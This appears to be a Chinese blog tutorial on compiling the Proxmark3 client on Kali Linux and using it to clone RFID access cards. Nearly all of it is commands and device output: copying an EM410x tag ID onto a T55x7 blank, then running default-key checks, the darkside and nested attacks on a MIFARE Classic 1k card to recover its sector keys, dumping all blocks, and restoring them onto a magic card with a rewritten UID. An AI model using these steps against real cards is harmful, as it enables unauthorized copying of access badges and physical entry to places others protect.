2018-06-19:ProxMark3 复制IC卡,IC卡
一、Kali Linux下ProxMark3客户端的编译和升级
sudo apt-get install p7zip git build-essential
sudo apt-get install libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config
sudo apt-get install wget libncurses5-dev gcc-arm-none-eabi
cd ~ ##切换到用户目录
git clone https://github.com/iceman1001/proxmark3.git ##克隆仓库
cd /proxmark3 ##进入目录
git pull ##更新仓库,后续升级可以直接从这一步开始
make clean && make all ##编译仓库
sudo client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf
client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf
dmesg | grep -i usb
client/proxmark3 /dev/ttyACM0
hw tune
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...
[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] LF optimal: 24.50 V - 126.32 kHz
[+] LF antenna is OK
[+] HF antenna: 15.37 V - 13.56 MHz
[+] HF antenna is OK
[+] Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
pm3 -->
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...
[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] LF optimal: 24.50 V - 126.32 kHz
[+] LF antenna is OK
[+] HF antenna: 14.20 V - 13.56 MHz
[+] HF antenna is OK
[+] Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...
[+] LF antenna: 24.08 V - 125.00 kHz
[+] LF antenna: 21.10 V - 134.00 kHz
[+] LF optimal: 24.50 V - 126.32 kHz
[+] LF antenna is OK
[+] HF antenna: 15.74 V - 13.56 MHz
[+] HF antenna is OK
[+] Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
pm3 --> lf search
NOTE: some demods output possible binary
if it finds something that looks like a tag
False Positives ARE possible
Checking for known tags:
EM410x pattern found
EM TAG ID : 08003C9F5F
Possible de-scramble patterns
Unique TAG ID : 10003CF9FA
HoneyWell IdentKey {
DEZ 8 : 03972959
DEZ 10 : 0003972959
DEZ 5.5 : 00060.40799
DEZ 3.5A : 008.40799
DEZ 3.5B : 000.40799
DEZ 3.5C : 060.40799
DEZ 14/IK2 : 00034363711327
DEZ 15/IK3 : 000068723472890
DEZ 20/ZK : 01000000031215091510
Other : 40799_060_03972959
Pattern Paxton : 139517279 [0x850DD5F]
Pattern 1 : 5597182 [0x5567FE]
Pattern Sebury : 40799 60 3972959 [0x9F5F 0x3C 0x3C9F5F]
[+] Valid EM410x ID Found!
从回显结果,可以获知卡的类型是EM410x,EM ID是08003C9F5F。接着直接写入新卡
if em 410x_write工具写入,最后1和64是写入的数据块大小
pm3 --> lf em 410x_write 08003C9F5F 1 64
Writing T55x7 tag with UID 0x08003c9f5f (clock rate: 64)
#db# Started writing T55x7 tag ...
#db# Clock rate: 64
#db# Tag T55x7 written with 0xff822001b12f2bd6
1读卡:hf 14a info
pm3 --> hf 14a info
UID : 15 54 C6 AC
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 | 1k Ev1
[=] proprietary non iso14443-4 card found, RATS not supported
[=] Answers to magic commands: NO
[+] Prng detection: WEAK
pm3 -->
可以得到这张卡的UID是1554C6AC,卡的类型是mifare c1,即m1卡,存储空间时1k
hf mf chk *1 ? t
pm3 --> hf mf chk *1 ? t
No key specified, trying default keys
[ 0] ffffffffffff
[ 1] 000000000000
[ 2] a0a1a2a3a4a5
[ 3] b0b1b2b3b4b5
[ 4] c0c1c2c3c4c5
[ 5] d0d1d2d3d4d5
[ 6] aabbccddeeff
[ 7] 1a2b3c4d5e6f
[ 8] 123456789abc
[ 9] 010203040506
[10] 123456abcdef
[11] abcdef123456
[12] 4d3a99c351dd
[13] 1a982c7e459a
[14] d3f7d3f7d3f7
[15] 714c5c886e97
[16] 587ee5f9350f
[17] a0478cc39091
[18] 533cb6c723f6
[19] 8fd0a4f256e9
Time in checkkeys: 10 seconds
testing to read key B...
|sec|key A |res|key B |res|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| ffffffffffff | 1 | ffffffffffff | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ------------ | 0 | ------------ | 0 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ------------ | 0 | ffffffffffff | 1 |
|011| ------------ | 0 | ffffffffffff | 1 |
|012| ------------ | 0 | ffffffffffff | 1 |
|013| ------------ | 0 | ffffffffffff | 1 |
|014| ------------ | 0 | ffffffffffff | 1 |
|015| ------------ | 0 | ffffffffffff | 1 |
Found keys have been transferred to the emulator memory
回显的标识key a,key b就是每个扇区的密码,接着可以利用nested攻击,获取所有扇区的密码
hf mf darkside
pm3 --> hf mf darkside
executing Darkside attack. Expected execution time: 25sec on average
press pm3-button on the proxmark3 device to abort both proxmark3 and client.
[+] Parity is all zero. Most likely this card sends NACK on every authentication.
[-] no candidates found, trying again
[-] no candidates found, trying again
[+] found 12 candidate keys.
[+] found valid key: ffffffffffff
hf mf nested 1 0 A ffffffffffff d
pm3 --> hf mf nested 1 0 A ffffffffffff d
[+] Testing known keys. Sector count=16
[-] Chunk: 1.4s | found 24/32 keys (21)
[+] Time to check 20 known keys: 1 seconds
[+] enter nested attack
[+] target block: 20 key type: A
[+] target block: 20 key type: B -- found valid key [eba93a57cfe0]
[-] Chunk: 0.5s | found 1/32 keys (1)
[+] target block: 40 key type: A
[+] target block: 44 key type: A
[+] target block: 48 key type: A -- found valid key [505df95da97b]
[-] Chunk: 0.5s | found 21/32 keys (1)
[+] target block: 20 key type: A -- found valid key [1456c5a8301f]
[-] Chunk: 0.6s | found 2/32 keys (1)
[+] time in nested: 8 seconds
[+] trying to read key B...
|sec|key A |res|key B |res|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| ffffffffffff | 1 | ffffffffffff | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| 1456c5a8301f | 1 | eba93a57cfe0 | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| 505df95da97b | 1 | ffffffffffff | 1 |
|011| 505df95da97b | 1 | ffffffffffff | 1 |
|012| 505df95da97b | 1 | ffffffffffff | 1 |
|013| 505df95da97b | 1 | ffffffffffff | 1 |
|014| 505df95da97b | 1 | ffffffffffff | 1 |
|015| 505df95da97b | 1 | ffffffffffff | 1 |
[+] saving keys to binary file hf-mf-1554C6AC-key.bin...
hf mf dump
pm3 --> hf mf dump
|------ Reading sector access bits...-----|
|----- Dumping all blocks to file... -----|
[+] successfully read block 0 of sector 0.
[+] successfully read block 1 of sector 0.
[+] successfully read block 2 of sector 0.
[+] successfully read block 3 of sector 0.
[+] successfully read block 1 of sector 15.
[+] successfully read block 2 of sector 15.
[+] successfully read block 3 of sector 15.
[+] dumped 64 blocks (1024 bytes) to file hf-mf-1554C6AC-data.bin
hf mf csetuid xxxxxxxx w
hf mf restore